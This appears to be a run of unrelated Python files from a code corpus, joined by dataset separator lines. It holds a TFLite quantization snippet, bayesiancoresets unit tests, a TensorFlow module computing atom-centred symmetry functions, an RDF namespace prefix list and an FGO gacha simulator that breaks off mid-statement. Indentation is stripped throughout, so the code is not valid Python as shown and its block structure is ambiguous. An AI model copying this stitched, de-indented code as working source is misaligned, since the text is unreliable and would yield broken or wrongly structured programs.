image = data['image'].numpy()
image = tf.image.resize(image, (480, 640))
image = image[np.newaxis,:,:,:]
image = image - 127.5
image = image * 0.007843
yield [image]
raw_test_data, info = tfds.load(name="coco/2017", with_info=True, split="test", data_dir="~/TFDS", download=False)
# Integer Quantization - Input/Output=float32
height = 480
width = 640
converter = tf.lite.TFLiteConverter.from_saved_model('saved_model_nyu_{}x{}'.format(height, width))
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.representative_dataset = representative_dataset_gen_480x640
tflite_model = converter.convert()
with open('dense_depth_nyu_{}x{}_integer_quant.tflite'.format(height, width), 'wb') as w:
w.write(tflite_model)
print('Integer Quantization complete! - dense_depth_nyu_{}x{}_integer_quant.tflite'.format(height, width))
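# ----------------------------------------------------------------------------
# Optional sanity-check sketch (illustrative only): load the quantized model
# with the TFLite interpreter and push one preprocessed 480x640 image through.
# The variable `image` is assumed to be prepared exactly as in
# representative_dataset_gen_480x640 above.
#
#   interpreter = tf.lite.Interpreter(
#       model_path='dense_depth_nyu_480x640_integer_quant.tflite')
#   interpreter.allocate_tensors()
#   input_details = interpreter.get_input_details()
#   output_details = interpreter.get_output_details()
#   interpreter.set_tensor(input_details[0]['index'], image)
#   interpreter.invoke()
#   depth = interpreter.get_tensor(output_details[0]['index'])
#   print(depth.shape)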
|
nilq/baby-python
|
python
|
import bayesiancoresets as bc
import numpy as np
import warnings
warnings.filterwarnings('ignore', category=UserWarning) #tests will generate warnings (due to pathological data design for testing), just ignore them
np.seterr(all='raise')
np.set_printoptions(linewidth=500)
np.random.seed(100)
tol = 1e-9
def test_empty():
x = np.random.randn(0, 0)
fd = bc.FullDataset(x)
for m in [1, 10, 100]:
fd.run(m)
assert fd.error() < tol, "full wts failed: error not 0"
assert np.all(fd.weights() == np.ones(x.shape[0])), "full wts failed: weights not ones"
#check reset
fd.reset()
assert fd.M == 0 and np.all(np.fabs(fd.weights()) == 0.) and np.fabs(fd.error() - np.sqrt((fd.snorm**2).sum())) < tol and not fd.reached_numeric_limit, "FullDataset failed: reset() did not properly reset"
def test_one():
x = np.random.randn(1, 3)
fd = bc.FullDataset(x)
for m in [1, 10, 100]:
fd.run(m)
assert fd.error() < tol, "full wts failed: error not 0"
assert np.all(fd.weights() == np.ones(x.shape[0])), "full wts failed: weights not ones: "+str(fd.weights())
#check reset
fd.reset()
assert fd.M == 0 and np.all(np.fabs(fd.weights()) == 0.) and np.fabs(fd.error() - np.sqrt((fd.snorm**2).sum())) < tol and not fd.reached_numeric_limit, "FullDataset failed: reset() did not properly reset"
def test_many():
x = np.random.randn(10, 3)
fd = bc.FullDataset(x)
for m in [1, 10, 100]:
fd.run(m)
assert fd.error() < tol, "full wts failed: error not 0"
assert np.all(fd.weights() == np.ones(x.shape[0])), "full wts failed: weights not ones "+str(fd.weights())
#check reset
fd.reset()
assert fd.M == 0 and np.all(np.fabs(fd.weights()) == 0.) and np.fabs(fd.error() - np.sqrt((fd.snorm**2).sum())) < tol and not fd.reached_numeric_limit, "FullDataset failed: reset() did not properly reset"
|
nilq/baby-python
|
python
|
# MIT License
#
# Copyright (c) 2018 Silvia Amabilino
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This module contains an implementation of the symmetry functions used in the Parkhill paper https://arxiv.org/pdf/1711.06385.pdf.
This implementation is different. It works for both data sets where all the molecules are the same but in different configurations and
for datasets with all different molecules.
Note: it is all in single precision.
"""
import tensorflow as tf
import numpy as np
def acsf_rad(xyzs, Zs, radial_cutoff, radial_rs, eta):
"""
This does the radial part of the symmetry function (G2 function in Behler's papers). It works only for datasets where
all samples are the same molecule but in different configurations.
    :param xyzs: tf tensor of shape (n_samples, n_atoms, 3) containing the coordinates of each atom in each data sample
:param Zs: tf tensor of shape (n_samples, n_atoms) containing the atomic number of each atom in each data sample
:param radial_cutoff: scalar tensor
:param radial_rs: tf tensor of shape (n_rs,) with the R_s values
:param eta: tf scalar
:return: tf tensor of shape (n_samples, n_atoms, n_atoms, n_rs)
"""
# Calculating the distance matrix between the atoms of each sample
with tf.name_scope("Distances"):
dxyzs = tf.expand_dims(xyzs, axis=2) - tf.expand_dims(xyzs, axis=1)
dist_tensor = tf.cast(tf.norm(dxyzs, axis=3), dtype=tf.float32) # (n_samples, n_atoms, n_atoms)
# Indices of terms that need to be zero (diagonal elements)
mask_0 = tf.zeros(tf.shape(dist_tensor))
mask_1 = tf.ones(tf.shape(Zs))
where_eq_idx = tf.cast(tf.matrix_set_diag(mask_0, mask_1), dtype=tf.bool)
# Calculating the exponential term
with tf.name_scope("Exponential_term"):
expanded_rs = tf.expand_dims(tf.expand_dims(tf.expand_dims(radial_rs, axis=0), axis=0), axis=0) # (1, 1, 1, n_rs)
expanded_dist = tf.expand_dims(dist_tensor, axis=-1) # (n_samples, n_atoms, n_atoms, 1)
exponent = - eta * tf.square(tf.subtract(expanded_dist, expanded_rs))
exp_term = tf.exp(exponent) # (n_samples, n_atoms, n_atoms, n_rs)
# Calculating the fc terms
with tf.name_scope("fc_term"):
# Finding where the distances are less than the cutoff
where_less_cutoff = tf.less(dist_tensor, radial_cutoff)
# Calculating all of the fc function terms
fc = 0.5 * (tf.cos(3.14159265359 * dist_tensor / radial_cutoff) + 1.0)
# Setting to zero the terms where the distance is larger than the cutoff
zeros = tf.zeros(tf.shape(dist_tensor), dtype=tf.float32)
cut_off_fc = tf.where(where_less_cutoff, fc, zeros) # (n_samples, n_atoms, n_atoms)
# Cleaning up diagonal terms
clean_fc_term = tf.where(where_eq_idx, zeros, cut_off_fc)
# Cleaning up dummy atoms terms
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
dummy_mask = tf.logical_and(tf.expand_dims(dummy_atoms, axis=1), tf.expand_dims(dummy_atoms, axis=-1))
cleaner_fc_term = tf.where(dummy_mask, clean_fc_term, zeros)
# Multiplying exponential and fc terms
expanded_fc = tf.expand_dims(cleaner_fc_term, axis=-1) # (n_samples, n_atoms, n_atoms, 1)
with tf.name_scope("Rad_term"):
presum_term = tf.multiply(expanded_fc, exp_term) # (n_samples, n_atoms, n_atoms, n_rs)
return presum_term
def acsf_ang(xyzs, Zs, angular_cutoff, angular_rs, theta_s, zeta, eta):
"""
This does the angular part of the symmetry function as mentioned here: https://arxiv.org/pdf/1711.06385.pdf
It only works for systems where all the samples are the same molecule but in different configurations.
    :param xyzs: tf tensor of shape (n_samples, n_atoms, 3) containing the coordinates of each atom in each data sample
:param Zs: tf tensor of shape (n_samples, n_atoms) containing the atomic number of each atom in each data sample
:param angular_cutoff: scalar tensor
:param angular_rs: tf tensor of shape (n_ang_rs,) with the equivalent of the R_s values from the G2
:param theta_s: tf tensor of shape (n_thetas,)
:param zeta: tf tensor of shape (1,)
:param eta: tf tensor of shape (1,)
:return: tf tensor of shape (n_samples, n_atoms, n_atoms, n_atoms, n_ang_rs * n_thetas)
"""
# Finding the R_ij + R_ik term
with tf.name_scope("Sum_distances"):
dxyzs = tf.expand_dims(xyzs, axis=2) - tf.expand_dims(xyzs, axis=1)
dist_tensor = tf.cast(tf.norm(dxyzs, axis=3), dtype=tf.float32) # (n_samples, n_atoms, n_atoms)
# This is the tensor where element sum_dist_tensor[0,1,2,3] is the R_12 + R_13 in the 0th data sample
sum_dist_tensor = tf.expand_dims(dist_tensor, axis=3) + tf.expand_dims(dist_tensor,
axis=2) # (n_samples, n_atoms, n_atoms, n_atoms)
# Problem with the above tensor: we still have the R_ii + R_ik distances which are non zero and could be summed
# These need to be set to zero
n_atoms = Zs.get_shape().as_list()[1]
zarray = np.zeros((n_atoms, n_atoms, n_atoms))
for i in range(n_atoms):
for j in range(n_atoms):
for k in range(n_atoms):
if i == j or i == k or j == k:
zarray[i, j, k] = 1
# Make a bool tensor of the indices
where_eq_idx = tf.tile(tf.expand_dims(tf.convert_to_tensor(zarray, dtype=tf.bool), axis=0),
multiples=[tf.shape(sum_dist_tensor)[0], 1, 1, 1])
# For all the elements that are true in where_eq_idx, turn the elements of sum_dist_tensor to zero
zeros_1 = tf.zeros(tf.shape(sum_dist_tensor), dtype=tf.float32)
# Now finding the fc terms
with tf.name_scope("Fc_term"):
# 1. Find where Rij and Rik are < cutoff
where_less_cutoff = tf.less(dist_tensor, angular_cutoff)
# 2. Calculate the fc on the Rij and Rik tensors
fc_1 = 0.5 * (tf.cos(3.14159265359 * dist_tensor / angular_cutoff) + 1.0)
# 3. Apply the mask calculated in 1. to zero the values for where the distances are > than the cutoff
zeros_2 = tf.zeros(tf.shape(dist_tensor), dtype=tf.float32)
cut_off_fc = tf.where(where_less_cutoff, fc_1, zeros_2) # (n_samples, n_atoms, n_atoms)
# 4. Multiply the two tensors elementwise
fc_term = tf.multiply(tf.expand_dims(cut_off_fc, axis=3),
tf.expand_dims(cut_off_fc, axis=2)) # (n_samples, n_atoms, n_atoms, n_atoms)
# 5. Cleaning up the terms that should be zero because there are equal indices
clean_fc_term = tf.where(where_eq_idx, zeros_1, fc_term)
# 6. Cleaning up the terms due to the dummy atoms
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
dummy_mask_2d = tf.logical_and(tf.expand_dims(dummy_atoms, axis=1), tf.expand_dims(dummy_atoms, axis=-1))
dummy_mask_3d = tf.logical_and(tf.expand_dims(dummy_mask_2d, axis=1), tf.expand_dims(tf.expand_dims(dummy_atoms, axis=-1), axis=-1))
cleaner_fc_term = tf.where(dummy_mask_3d, clean_fc_term, zeros_1)
# Now finding the theta_ijk term
with tf.name_scope("Theta"):
# Doing the dot products of all the possible vectors
dots_dxyzs = tf.cast(tf.reduce_sum(tf.multiply(tf.expand_dims(dxyzs, axis=3), tf.expand_dims(dxyzs, axis=2)),
axis=4), dtype=tf.float32) # (n_samples, n_atoms, n_atoms, n_atoms)
# Doing the products of the magnitudes
dist_prod = tf.multiply(tf.expand_dims(dist_tensor, axis=3),
tf.expand_dims(dist_tensor, axis=2)) # (n_samples, n_atoms, n_atoms, n_atoms)
# Dividing the dot products by the magnitudes to obtain cos theta
cos_theta = tf.divide(dots_dxyzs, dist_prod)
        # Taking care of the values that due to numerical error are just above 1.0 or below -1.0
cut_cos_theta = tf.clip_by_value(cos_theta, tf.constant(-1.0), tf.constant(1.0))
# Applying arc cos to find the theta value
theta = tf.acos(cut_cos_theta) # (n_samples, n_atoms, n_atoms, n_atoms)
# Removing the NaNs created by dividing by zero
clean_theta = tf.where(where_eq_idx, zeros_1, theta)
# cleaning up NaNs due by dummy atoms
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
dummy_mask_2d = tf.logical_and(tf.expand_dims(dummy_atoms, axis=1), tf.expand_dims(dummy_atoms, axis=-1))
dummy_mask_3d = tf.logical_and(tf.expand_dims(dummy_mask_2d, axis=1),
tf.expand_dims(tf.expand_dims(dummy_atoms, axis=-1), axis=-1))
cleaner_theta = tf.where(dummy_mask_3d, clean_theta, zeros_1)
# Finding the (0.5 * clean_sum_dist - R_s) term
with tf.name_scope("Exp_term"):
# Augmenting the dims of angular_rs
expanded_rs = tf.expand_dims(tf.expand_dims(tf.expand_dims(tf.expand_dims(angular_rs, axis=0), axis=0), axis=0),
axis=0) # (1, 1, 1, 1, n_rs)
# Augmenting the dim of clean_sum_dist *0.5
# expanded_sum = tf.expand_dims(clean_sum_dist * 0.5, axis=-1)
expanded_sum = tf.expand_dims(sum_dist_tensor * 0.5, axis=-1)
# Combining them
brac_term = tf.subtract(expanded_sum, expanded_rs)
# Finally making the exponential term
exponent = - eta * tf.square(brac_term)
exp_term = tf.exp(exponent) # (n_samples, n_atoms, n_atoms, n_atoms, n_rs)
# Finding the cos(theta - theta_s) term
with tf.name_scope("Cos_term"):
# Augmenting the dimensions of theta_s
expanded_theta_s = tf.expand_dims(tf.expand_dims(tf.expand_dims(tf.expand_dims(theta_s, axis=0), axis=0), axis=0),
axis=0)
# Augmenting the dimensions of theta
expanded_theta = tf.expand_dims(cleaner_theta, axis=-1)
# Subtracting them and do the cos
cos_theta_term = tf.cos(
tf.subtract(expanded_theta, expanded_theta_s)) # (n_samples, n_atoms, n_atoms, n_atoms, n_theta_s)
# Make the whole cos term of the sum
cos_term = tf.pow(tf.add(tf.ones(tf.shape(cos_theta_term), dtype=tf.float32), cos_theta_term),
zeta) # (n_samples, n_atoms, n_atoms, n_atoms, n_theta_s)
    # Final product of terms inside the sum, multiplied by 2^(1-zeta)
expanded_fc = tf.expand_dims(tf.expand_dims(cleaner_fc_term, axis=-1), axis=-1, name="Expanded_fc")
expanded_cos = tf.expand_dims(cos_term, axis=-2, name="Expanded_cos")
expanded_exp = tf.expand_dims(exp_term, axis=-1, name="Expanded_exp")
const = tf.pow(tf.constant(2.0, dtype=tf.float32), (1.0 - zeta))
with tf.name_scope("Ang_term"):
prod_of_terms = const * tf.multiply(tf.multiply(expanded_cos, expanded_exp),
expanded_fc) # (n_samples, n_atoms, n_atoms, n_atoms, n_rs, n_theta_s)
# Reshaping to shape (n_samples, n_atoms, n_atoms, n_atoms, n_rs*n_theta_s)
presum_term = tf.reshape(prod_of_terms,
[tf.shape(prod_of_terms)[0], n_atoms, n_atoms, n_atoms,
theta_s.shape[0] * angular_rs.shape[0]])
return presum_term
def sum_rad(pre_sum, Zs, elements_list, radial_rs):
"""
Sum of the terms in the radial part of the symmetry function. The terms corresponding to the same neighbour identity
are summed together.
:param pre_sum: tf tensor of shape (n_samples, n_atoms, n_atoms, n_rs)
:param Zs: tf tensor of shape (n_samples, n_atoms)
:param elements_list: np.array of shape (n_elements,)
:param radial_rs: tf tensor of shape (n_rad_rs,)
:return: tf tensor of shape (n_samples, n_atoms, n_rad_rd * n_elements)
"""
n_atoms = Zs.get_shape().as_list()[1]
n_elements = len(elements_list)
n_rs = radial_rs.get_shape().as_list()[0]
## Making a matrix of all the possible neighbouring atoms
# No need to clean up diagonal elements because they are already set to zero in the presum term
neighb_atoms = tf.tile(tf.expand_dims(tf.expand_dims(Zs, axis=1), axis=-1),
multiples=[1, n_atoms, 1, n_rs]) # (n_samples, n_atoms, n_atoms, n_rs)
zeros = tf.zeros(tf.shape(pre_sum), dtype=tf.float32)
# Looping over all the possible elements in the system and extracting the relevant terms from the pre_sum term
pre_sum_terms = []
for i in range(n_elements):
element = tf.constant(elements_list[i], dtype=tf.int32)
equal_elements = tf.equal(neighb_atoms, element)
slice_presum = tf.where(equal_elements, pre_sum, zeros)
slice_sum = tf.reduce_sum(slice_presum, axis=[2])
pre_sum_terms.append(slice_sum)
# Concatenating the extracted terms.
final_term = tf.concat(pre_sum_terms, axis=-1, name="sum_rad")
# Cleaning up the dummy atoms descriptors
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
mask = tf.tile(tf.expand_dims(dummy_atoms, axis=-1), multiples=[1, 1, n_elements*n_rs])
# clean_final_term = tf.where(mask, final_term, tf.zeros(final_term.shape, dtype=tf.float32))
clean_final_term = tf.where(mask, final_term, tf.zeros(tf.shape(final_term), dtype=tf.float32))
return clean_final_term
def sum_ang(pre_sumterm, Zs, element_pairs_list, angular_rs, theta_s):
"""
    This function does the sum of the terms in the angular part of the symmetry function. Three body interactions where
the two neighbours are the same elements are summed together.
    :param pre_sumterm: tf tensor of shape (n_samples, n_atoms, n_atoms, n_atoms, n_ang_rs * n_thetas)
:param Zs: tf tensor of shape (n_samples, n_atoms)
:param element_pairs_list: np array of shape (n_elementpairs, 2)
:param angular_rs: tf tensor of shape (n_ang_rs,)
:param theta_s: tf tensor of shape (n_thetas,)
:return: tf tensor of shape (n_samples, n_atoms, n_ang_rs * n_thetas * n_elementpairs)
"""
n_atoms = Zs.get_shape().as_list()[1]
n_pairs = len(element_pairs_list)
n_rs = angular_rs.get_shape().as_list()[0]
n_thetas = theta_s.get_shape().as_list()[0]
# Making the pair matrix
Zs_exp_1 = tf.expand_dims(tf.tile(tf.expand_dims(Zs, axis=1), multiples=[1, n_atoms, 1]), axis=-1)
Zs_exp_2 = tf.expand_dims(tf.tile(tf.expand_dims(Zs, axis=-1), multiples=[1, 1, n_atoms]), axis=-1)
neighb_pairs = tf.concat([Zs_exp_1, Zs_exp_2], axis=-1) # (n_samples, n_atoms, n_atoms, 2)
# Cleaning up diagonal elements
zarray = np.zeros((n_atoms, n_atoms, 2))
for i in range(n_atoms):
zarray[i, i, :] = 1
# Make a bool tensor of the indices
where_eq_idx = tf.tile(tf.expand_dims(tf.convert_to_tensor(zarray, dtype=tf.bool), axis=0),
multiples=[tf.shape(Zs)[0], 1, 1, 1]) # (n_samples, n_atoms, n_atoms, 2)
zeros = tf.zeros(tf.shape(neighb_pairs), dtype=tf.int32)
clean_pairs = tf.where(where_eq_idx, zeros, neighb_pairs)
# Sorting the pairs in descending order so that for example pair [7, 1] is the same as [1, 7]
sorted_pairs, _ = tf.nn.top_k(clean_pairs, k=2, sorted=True) # (n_samples, n_atoms, n_atoms, 2)
# Preparing to clean the sorted pairs from where there will be self interactions in the three-body-terms
oarray = np.ones((n_atoms, n_atoms, n_atoms))
for i in range(n_atoms):
for j in range(n_atoms):
for k in range(n_atoms):
if i == j or i == k or j == k:
oarray[i, j, k] = 0
# Make a bool tensor of the indices
where_self_int = tf.tile(tf.expand_dims(tf.convert_to_tensor(oarray, dtype=tf.bool), axis=0),
multiples=[tf.shape(Zs)[0], 1, 1, 1]) # (n_samples, n_atoms, n_atoms, n_atoms)
exp_self_int = tf.expand_dims(where_self_int, axis=-1) # (n_samples, n_atoms, n_atoms, n_atoms, 1)
zeros_large = tf.zeros(tf.shape(pre_sumterm), dtype=tf.float32, name="zero_large")
presum_terms = []
with tf.name_scope("Extract"):
for i in range(n_pairs):
# Making a tensor where all the elements are the pair under consideration
pair = tf.constant(element_pairs_list[i], dtype=tf.int32)
expanded_pair = tf.tile(
tf.expand_dims(tf.expand_dims(tf.expand_dims(pair, axis=0), axis=0), axis=0),
multiples=[tf.shape(Zs)[0], n_atoms, n_atoms, 1], name="expand_pair") # (n_samples, n_atoms, n_atoms, 2)
# Comparing which neighbour pairs correspond to the pair under consideration
equal_pair_mix = tf.equal(expanded_pair, sorted_pairs)
equal_pair_split1, equal_pair_split2 = tf.split(equal_pair_mix, 2, axis=-1)
equal_pair = tf.tile(tf.expand_dims(tf.logical_and(equal_pair_split1, equal_pair_split2), axis=[1]),
multiples=[1, n_atoms, 1, 1, 1]) # (n_samples, n_atoms, n_atoms, n_atoms, 1)
# Removing the pairs where the same atom is present more than once
int_to_keep = tf.logical_and(equal_pair, exp_self_int)
exp_int_to_keep = tf.tile(int_to_keep, multiples=[1, 1, 1, 1, n_rs * n_thetas])
# Extracting the terms that correspond to the pair under consideration
slice_presum = tf.where(exp_int_to_keep, pre_sumterm, zeros_large, name="sl_pr_s")
slice_sum = 0.5 * tf.reduce_sum(slice_presum, axis=[2, 3], name="sum_ang")
presum_terms.append(slice_sum)
# Concatenating all of the terms corresponding to different pair neighbours
final_term = tf.concat(presum_terms, axis=-1, name="concat_presum")
# Cleaning up the dummy atoms descriptors
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
mask = tf.tile(tf.expand_dims(dummy_atoms, axis=-1), multiples=[1, 1, n_thetas * n_rs * n_pairs])
clean_final_term = tf.where(mask, final_term, tf.zeros(tf.shape(final_term)))
return clean_final_term
def generate_parkhill_acsf(xyzs, Zs, elements, element_pairs, radial_cutoff, angular_cutoff,
radial_rs, angular_rs, theta_s, zeta, eta):
"""
This function generates the atom centred symmetry function as used in the Tensormol paper. Currently only tested for
single systems with many conformations. It requires the coordinates of all the atoms in each data sample, the atomic
charges for each atom (in the same order as the xyz), the overall elements and overall element pairs. Then it
requires the parameters for the ACSF that are used in the Tensormol paper: https://arxiv.org/pdf/1711.06385.pdf
:param xyzs: tensor of shape (n_samples, n_atoms, 3)
:param Zs: tensor of shape (n_samples, n_atoms)
:param elements: np.array of shape (n_elements,)
:param element_pairs: np.array of shape (n_elementpairs, 2)
:param radial_cutoff: scalar float
:param angular_cutoff: scalar float
:param radial_rs: np.array of shape (n_rad_rs,)
:param angular_rs: np.array of shape (n_ang_rs,)
:param theta_s: np.array of shape (n_thetas,)
:param zeta: scalar float
:param eta: scalar float
:return: a tf tensor of shape (n_samples, n_atoms, n_rad_rs * n_elements + n_ang_rs * n_thetas * n_elementpairs)
"""
with tf.name_scope("acsf_params"):
rad_cutoff = tf.constant(radial_cutoff, dtype=tf.float32)
ang_cutoff = tf.constant(angular_cutoff, dtype=tf.float32)
rad_rs = tf.constant(radial_rs, dtype=tf.float32)
ang_rs = tf.constant(angular_rs, dtype=tf.float32)
theta_s = tf.constant(theta_s, dtype=tf.float32)
zeta_tf = tf.constant(zeta, dtype=tf.float32)
eta_tf = tf.constant(eta, dtype=tf.float32)
## Calculating the radial part of the symmetry function
# First obtaining all the terms in the sum
with tf.name_scope("Radial_part"):
pre_sum_rad = acsf_rad(xyzs, Zs, rad_cutoff, rad_rs, eta_tf) # (n_samples, n_atoms, n_atoms, n_rad_rs)
with tf.name_scope("Sum_rad"):
# Then summing based on the identity of the atoms interacting
rad_term = sum_rad(pre_sum_rad, Zs, elements, rad_rs) # (n_samples, n_atoms, n_rad_rs*n_elements)
## Calculating the angular part of the symmetry function
# First obtaining all the terms in the sum
with tf.name_scope("Angular_part"):
pre_sum_ang = acsf_ang(xyzs, Zs, ang_cutoff, ang_rs, theta_s, zeta_tf, eta_tf) # (n_samples, n_atoms, n_atoms, n_atoms, n_thetas * n_ang_rs)
with tf.name_scope("Sum_ang"):
        # Then doing the sum based on the neighbouring pair identity
ang_term = sum_ang(pre_sum_ang, Zs, element_pairs, ang_rs, theta_s) # (n_samples, n_atoms, n_thetas * n_ang_rs*n_elementpairs)
with tf.name_scope("ACSF"):
acsf = tf.concat([rad_term, ang_term], axis=-1, name="acsf") # (n_samples, n_atoms, n_rad_rs*n_elements + n_thetas * n_ang_rs*n_elementpairs)
return acsf
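# ----------------------------------------------------------------------------
# Minimal usage sketch (illustrative only; the parameter values are assumptions
# loosely modelled on typical ACSF settings, not taken from this module).
# Written for the TF1-style graph mode this module targets.
#
#   import numpy as np
#   import tensorflow as tf
#
#   xyzs = tf.constant(np.random.rand(2, 3, 3), dtype=tf.float32)  # 2 samples of a 3-atom system
#   Zs = tf.constant([[8, 1, 1], [8, 1, 1]], dtype=tf.int32)        # e.g. water (O, H, H)
#   elements = np.array([1, 8])
#   element_pairs = np.array([[1, 1], [8, 1], [8, 8]])
#   acsf = generate_parkhill_acsf(xyzs, Zs, elements, element_pairs,
#                                 radial_cutoff=10.0, angular_cutoff=10.0,
#                                 radial_rs=np.arange(0.0, 10.0, 0.5),
#                                 angular_rs=np.arange(0.0, 10.0, 1.0),
#                                 theta_s=np.arange(0.0, np.pi, 0.5),
#                                 zeta=8.0, eta=4.0)
#   with tf.Session() as sess:
#       print(sess.run(acsf).shape)   # (n_samples, n_atoms, n_features)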
|
nilq/baby-python
|
python
|
# ro_prefixes.py
"""
Central list of prefixes commonly used with ROs
extended to support ro model updates and extensions for earth science (01/2017) by Raul Palma
"""
__authors__ = "Graham Klyne (GK@ACM.ORG), Raul Palma"
__copyright__ = "Copyright 2011-2013, University of Oxford"
__license__ = "MIT (http://opensource.org/licenses/MIT)"
prefixes = (
[ ("rdf", "http://www.w3.org/1999/02/22-rdf-syntax-ns#")
, ("rdfs", "http://www.w3.org/2000/01/rdf-schema#")
, ("owl", "http://www.w3.org/2002/07/owl#")
, ("xml", "http://www.w3.org/XML/1998/namespace")
, ("xsd", "http://www.w3.org/2001/XMLSchema#")
, ("rdfg", "http://www.w3.org/2004/03/trix/rdfg-1/")
, ("ro", "http://purl.org/wf4ever/ro#")
, ("roevo", "http://purl.org/wf4ever/roevo#")
, ("roterms", "http://purl.org/wf4ever/roterms#")
, ("wfprov", "http://purl.org/wf4ever/wfprov#")
, ("wfdesc", "http://purl.org/wf4ever/wfdesc#")
, ("wf4ever", "http://purl.org/wf4ever/wf4ever#")
, ("ore", "http://www.openarchives.org/ore/terms/")
, ("ao", "http://purl.org/ao/")
, ("dcterms", "http://purl.org/dc/terms/")
, ("dc", "http://purl.org/dc/elements/1.1/")
, ("foaf", "http://xmlns.com/foaf/0.1/")
, ("minim", "http://purl.org/minim/minim#")
, ("result", "http://www.w3.org/2001/sw/DataAccess/tests/result-set#")
, ("roes", "http://w3id.org/ro/earth-science#")
, ("oa", "http://www.w3.org/ns/oa#")
, ("pav", "http://purl.org/pav/")
, ("swrc", "http://swrc.ontoware.org/ontology#")
, ("cito", "http://purl.org/spar/cito/")
, ("dbo", "http://dbpedia.org/ontology/")
, ("ov", "http://open.vocab.org/terms/")
, ("bibo", "http://purl.org/ontology/bibo/")
, ("prov", "http://www.w3.org/ns/prov#")
, ("geo", "http://www.opengis.net/ont/geosparql#")
, ("sf", "http://www.opengis.net/ont/sf#")
, ("gml", "http://www.opengis.net/ont/gml#")
, ("odrs", "http://schema.theodi.org/odrs#")
, ("cc", "http://creativecommons.org/ns#")
, ("odrl", "http://www.w3.org/ns/odrl/2/")
, ("geo-wgs84", "http://www.w3.org/2003/01/geo/wgs84_pos#")
, ("voag", "http://voag.linkedmodel.org/schema/voag#")
# Workaround hack until Minim prefix handling is sorted out
, ("chembox", "http://dbpedia.org/resource/Template:Chembox:")
])
extra_prefixes = (
[ ("", "http://example.org/")
])
def make_turtle_prefixes(extra_prefixes=[]):
    return "\n".join([ "@prefix %s: <%s> ."%p for p in prefixes+extra_prefixes ]) + "\n\n"
def make_sparql_prefixes(extra_prefixes=[]):
    return "\n".join([ "PREFIX %s: <%s>"%p for p in prefixes+extra_prefixes ]) + "\n\n"
turtle_prefixstr = make_turtle_prefixes(extra_prefixes)
sparql_prefixstr = make_sparql_prefixes(extra_prefixes)
prefix_dict = dict(prefixes)
# from rocommand.ro_prefixes import prefixes, prefix_dict, make_turtle_prefixes, make_sparql_prefixes, sparql_prefixstr
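# Example usage (illustrative; the "ex" namespace below is an assumption):
#   query = make_sparql_prefixes([("ex", "http://example.org/vocab#")]) + \
#           "SELECT * WHERE { ?s ?p ?o } LIMIT 10"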
|
nilq/baby-python
|
python
|
import random
from lxml import etree
from typing import List
from PIL import ImageDraw
from nonebot.log import logger
try:
import ujson as json
except ModuleNotFoundError:
import json
from .base_handle import BaseHandle, BaseData
from ..config import draw_config
from ..util import remove_prohibited_str, cn2py, load_font
from ..create_img import CreateImg
class FgoData(BaseData):
pass
class FgoChar(FgoData):
pass
class FgoCard(FgoData):
pass
class FgoHandle(BaseHandle[FgoData]):
def __init__(self):
super().__init__("fgo", "命运-冠位指定")
self.data_files.append("fgo_card.json")
self.max_star = 5
self.config = draw_config.fgo
self.ALL_CHAR: List[FgoChar] = []
self.ALL_CARD: List[FgoCard] = []
def get_card(self, mode: int = 1) -> FgoData:
if mode == 1:
star = self.get_star(
[8, 7, 6, 5, 4, 3],
[
self.config.FGO_SERVANT_FIVE_P,
self.config.FGO_SERVANT_FOUR_P,
self.config.FGO_SERVANT_THREE_P,
self.config.FGO_CARD_FIVE_P,
self.config.FGO_CARD_FOUR_P,
self.config.FGO_CARD_THREE_P,
],
)
elif mode == 2:
star = self.get_star(
[5, 4], [self.config.FGO_CARD_FIVE_P, self.config.FGO_CARD_FOUR_P]
)
else:
star = self.get_star(
[8, 7, 6],
[
self.config.FGO_SERVANT_FIVE_P,
self.config.FGO_SERVANT_FOUR_P,
self.config.FGO_SERVANT_THREE_P,
],
)
if star > 5:
star -= 3
chars = [x for x in self.ALL_CHAR if x.star == star and not x.limited]
else:
chars = [x for x in self.ALL_CARD if x.star == star and not x.limited]
return random.choice(chars)
def get_cards(self, count: int, **kwargs) -> List[FgoData]:
        card_list = []  # list of all drawn cards
        servant_count = 0  # pity counter for servants
        card_count = 0  # pity counter for 4-star cards
for _ in range(count):
servant_count += 1
card_count += 1
            if card_count == 9:  # 4-star card pity
mode = 2
            elif servant_count == 10:  # 3-star servant pity
mode = 3
            else:  # normal pull
mode = 1
card = self.get_card(mode)
if isinstance(card, FgoCard) and card.star > self.max_star - 2:
card_count = 0
if isinstance(card, FgoChar):
servant_count = 0
card_list.append(card)
return card_list
def generate_card_img(self, card: FgoData) -> CreateImg:
sep_w = 5
sep_t = 5
sep_b = 20
w = 128
h = 140
bg = CreateImg(w + sep_w * 2, h + sep_t + sep_b)
img_path = str(self.img_path / f"{cn2py(card.name)}.png")
img = CreateImg(w, h, background=img_path)
bg.paste(img, (sep_w, sep_t), alpha=True)
        # add the name
text = card.name[:6] + "..." if len(card.name) > 7 else card.name
font = load_font(fontsize=16)
text_w, text_h = font.getsize(text)
draw = ImageDraw.Draw(bg.markImg)
draw.text(
